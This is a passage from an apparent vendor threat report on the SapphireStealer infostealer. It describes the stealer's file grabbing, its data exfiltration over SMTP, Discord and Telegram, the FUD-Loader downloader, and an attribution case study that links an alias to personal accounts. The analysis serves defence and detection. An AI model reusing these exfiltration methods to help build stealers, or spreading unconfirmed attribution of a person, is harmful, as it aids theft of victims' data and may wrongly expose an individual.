The malware creates a new subdirectory called `Files` within the malware’s working directory. A file grabber is then executed that attempts to locate any files stored within the victim’s Desktop folder that match a list of file extensions. The list varied across analyzed samples, but an example list is shown below:
.txt
.pdf
.doc
.docx
.xml
.img
.jpg
.png
Once the file grabber has completed execution, the malware then creates a compressed archive called log.zip containing all of the logs that were previously written to the malware’s working directory.
This data is then transmitted to the attacker via Simple Mail Transfer Protocol (SMTP) using credentials defined in the portion of code responsible for crafting and sending the message.
The following host-related information is collected and included in the body of the email message:
IP address
Hostname
Screen resolution
OS version and CPU architecture
ProcessorId
GPU Information
Once the logs have been successfully exfiltrated, the malware then deletes the working directory created earlier and terminates execution.
SapphireStealer extended to support additional exfiltration methods
Since initial samples began being uploaded to public malware repositories and scanning platforms, we’ve observed several notable modifications made by various threat actors. Most of the development effort appears to have been focused on facilitating more flexible data exfiltration and alerting for attackers that achieve new SapphireStealer infections. As this malware is open-source and being used by multiple distinct threat actors, much of this development activity has occurred independently and new functionality is not present in sample clusters associated with other threat actors.
In one case, we observed a SapphireStealer sample where the data collected using the previously described process was exfiltrated using the Discord webhook API, a method we previously highlighted here.
In this case, the Discord webhook URL (SendLog.url) was:
In several cases, we also observed SapphireStealer samples that featured the ability to alert attackers to newly acquired infections by transmitting the log data via the Telegram posting API.
In addition, we also observed variations in the file extensions being targeted for collection and exfiltration by the FileGrabber functionality present within SapphireStealer. While some were minimal, only containing a few file extensions, others contained a myriad of different file formats that the attacker could obtain.
Likewise, earlier versions of SapphireStealer featured redundant code execution, repeated superfluous executions of the same operations multiple times, and overall inefficiencies. During our analysis of other SapphireStealer samples over time, we observed repeated evidence that various threat actors had taken steps to streamline the malware’s operations, refactor the code significantly, and otherwise improve upon the core functionality of the stealer.
FUD-Loader used in multi-stage infections
In several cases, we observed threat actors attempting to leverage a malware downloader, called FUD-Loader which was also made available via the same GitHub account. This downloader was initially committed to GitHub on January 2, 2023, shortly after the initial code commit of SapphireStealer. Since its release, it’s been used by a variety of threats during the initial stages of the infection process to retrieve additional binary payloads from attacker-controlled distribution servers.
This loader, like SapphireStealer, was written in .NET and features fairly simplistic operations. It is essentially responsible for leveraging HTTP/HTTPS communications to retrieve additional executables from attacker-controlled infrastructure, saving the retrieved content to disk, and then executing it to continue the infection process.
In most of the cases where this loader was used, it retrieved the SapphireStealer binary payloads being hosted on the infrastructure described in the next section, allowing us to attribute those samples to the same threat actor.
Throughout the course of 2023, we have also observed this downloader being used to deliver various other threats such as DcRat, njRAT, DarkComet, AgentTesla and more.
A case study in operational security (OPSEC) failure
In one cluster of malware activity we analyzed, we observed multiple failures on the part of the threat actor to maintain sound operational security. In one sample, we observed the presence of the following Program Database (PDB) pathway still present post-compilation:
This sample was configured to use SMTP for data exfiltration and leveraged the following hardcoded credentials.
These credentials were also hardcoded into another sample we analyzed.
We observed that this second sample featured a different PDB, which contained a specific typographical error in the PDB pathway.
D:\C# proect\Sapphire\obj\Debug\Sapphire.pdb
An earlier sample featured the same PDB pathway and the same typographical error. In this case, the threat actor hardcoded personally identifiable SMTP account information for data exfiltration.
Looking for additional accounts that featured the handle/alias “romanmaslov200” led us to a variety of personal accounts that may be associated with the threat actor, such as an account for Steam, a popular video game storefront.
Two of these three samples were also observed being hosted at the following URL at various times:
In addition to the aforementioned Steam account, we also identified a matching account on a Russian language freelance forum. This account was being used to advertise freelance web development services. The user profile also lists the domain observed hosting SapphireStealer samples and various dependency components retrieved for parsing credential databases and exfiltrating the data.
One of the byproducts of readily available and open-source malware codebases is that the barrier to entry into financially motivated cybercrime has continued to decrease over time. This trend has become apparent when analyzing campaigns run by individuals or groups that demonstrate inexperience in establishing operational security throughout the various stages of the attack lifecycle. While it may take less operational expertise to conduct information stealer attacks, they can be extremely damaging to corporate environments as the data stolen is often leveraged for additional attacks at a later time.
Coverage
Ways our customers can detect and block this threat are listed below.
Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
The following Snort SIDs are applicable to this threat: 62243-62247.
Orbital Queries
Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. For specific OSqueries on this threat, click here.
Indicators of Compromise
IOCs for this research can also be found at our Github repository here
Login
